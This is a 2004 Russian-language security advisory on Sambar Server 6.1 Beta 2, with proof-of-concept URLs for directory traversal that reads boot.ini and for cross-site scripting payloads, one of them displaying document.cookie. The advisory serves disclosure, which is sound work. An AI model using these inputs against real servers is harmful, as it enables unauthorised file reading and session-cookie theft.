Несколько уязвимостей в Sambar Server
| Дата публикации: | 02.06.2004 |
| Всего просмотров: | 1046 |
| Опасность: | Низкая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Межсайтовый скриптинг |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Sambar Server 6.x |
| Уязвимые версии: Sambar Server 6.1 Beta 2
Описание: Несколько уязвимостей обнаружено в Sambar Server. Удаленный авторизованный администратор может просматривать файлы, расположенные вне Sambar Server директории. Удаленный пользователь также может выполнить XSS нападение. 1. Раскрытие файлов: http://myserver/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini http://localhost/sys admin/system/showlog.asp?log=c:\boot.ini&tail=yПо умолчанию, администрировать Sambar возможно только с localhost. 2. XSS:
http://localhost/sysadmin/system/sho w.asp?show=<script>alert("oops")</script>
http://localhost/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script>
URL производителя:http://www.sambar.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | [Full-Disclosure] =?iso-8859-1?Q?Sambar_Proxy_Multible_Vulnerabilities?= |